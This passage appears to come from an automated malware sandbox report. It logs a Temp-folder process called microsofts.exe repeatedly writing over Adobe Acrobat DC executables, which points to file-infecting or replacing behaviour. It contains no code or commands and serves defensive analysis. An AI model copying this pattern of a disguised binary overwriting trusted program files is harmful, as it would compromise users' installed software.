                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
